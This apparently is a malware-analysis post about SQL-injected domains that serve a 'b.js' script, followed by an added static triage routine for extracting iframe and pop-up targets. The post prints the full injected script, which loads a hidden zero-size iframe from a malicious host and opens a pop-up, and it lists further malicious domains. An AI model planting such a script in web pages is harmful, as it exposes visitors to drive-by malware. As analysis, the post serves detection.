New SQL-injected domains

http://www.encode72.com/b.js

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("bannerupdate=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=http://err68.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
window.open("http://topsoftwaresale.com",'soft',"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=1015,height=600,top=10,left=10");
}
catch(e)
{
};
}

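As the content shows, the script opens the website topsoftwaresale.com in a pop-up window, but it also embeds a zero-size iframe from err68.com/cgi-bin/index.cgi?ad. The bannerupdate cookie, which expires after 24 hours, keeps the script from running again in the same browser until then.
The content of the iframe, and how to decode it, can be seen here.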

The other injected domains work the same way as the one above. Each b.js script below loads the iframe shown after the arrow:
http://www.tag58.com/b.js -> encode72.com/cgi-bin/index.cgi?ad
http://www.win496.com/b.js -> exec51.com/cgi-bin/index.cgi?ad
http://www.exe94.com/b.js -> err68.com/cgi-bin/index.cgi?ad
http://www.view89.com/b.js -> err68.com/cgi-bin/index.cgi?ad
http://www.rundll841.com/b.js -> win496.com/cgi-bin/index.cgi?ad
err68.com/b.js -> win496.com/cgi-bin/index.cgi?ad
exec51.com/b.js -> err68.com/cgi-bin/index.cgi?ad
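
An added example, not part of the original post: a static triage routine that pulls the iframe target, the pop-up URL and the gating cookie out of a b.js-style script without executing or fetching anything, which is how a mapping like the list above can be built safely. The function names (hostOf, numAttr, triageScript, hostsToHunt) are hypothetical, and SAMPLE is the script quoted above trimmed to the relevant lines.

```javascript
// Added example: static triage of a b.js-style script. Nothing is executed or fetched.
// SAMPLE is the script quoted above, trimmed to the lines that matter (constructed input).
const SAMPLE = [
  'var start = cookieString.indexOf("bannerupdate=");',
  'document.cookie = "bannerupdate=update;expires=" + expires.toGMTString();',
  'document.write("<iframe src=http://err68.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");',
  'window.open("http://topsoftwaresale.com",\'soft\',"toolbar=no,width=1015,height=600");',
].join("\n");

// Hostname of a URL, tolerating a missing scheme and a leading "www.".
function hostOf(url) {
  const full = /^[a-z][a-z0-9+.-]*:\/\//i.test(url) ? url : "http://" + url;
  try { return new URL(full).hostname.replace(/^www\./, ""); } catch (e) { return null; }
}

// Numeric value of an HTML attribute (quoted, escaped-quoted or bare), or null.
function numAttr(attrs, name) {
  const m = new RegExp("\\b" + name + "\\s*=\\s*\\\\?[\"']?(\\d+)", "i").exec(attrs);
  return m ? Number(m[1]) : null;
}

// Hypothetical helper: list iframes, pop-ups and gating cookies found in the source text.
function triageScript(source) {
  const report = { iframes: [], popups: [], gateCookies: [] };
  let m;
  const iframeRe = /<iframe\b([^>]*)>/gi;
  while ((m = iframeRe.exec(source)) !== null) {
    const src = /\bsrc\s*=\s*\\?["']?([^\s"'\\>]+)/i.exec(m[1]);
    if (!src) continue;
    const hidden = numAttr(m[1], "width") === 0 || numAttr(m[1], "height") === 0;
    report.iframes.push({ src: src[1], host: hostOf(src[1]), hidden });
  }
  const openRe = /window\.open\(\s*["']([^"']+)["']/g;
  while ((m = openRe.exec(source)) !== null) {
    report.popups.push({ url: m[1], host: hostOf(m[1]) });
  }
  // A cookie the script sets itself is what limits it to one run per expiry period.
  const cookieRe = /document\.cookie\s*=\s*["']([\w-]+)=/g;
  while ((m = cookieRe.exec(source)) !== null) report.gateCookies.push(m[1]);
  return report;
}

// Unique hostnames to search for in proxy, DNS and web-server logs.
function hostsToHunt(report) {
  const hosts = [...report.iframes, ...report.popups].map((x) => x.host).filter(Boolean);
  return [...new Set(hosts)].sort();
}

console.log(JSON.stringify(triageScript(SAMPLE), null, 2));
console.log(hostsToHunt(triageScript(SAMPLE)));
```

The patterns allow whitespace, including line breaks, around the `=` of an attribute, so a script saved with hard-wrapped lines is still parsed.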
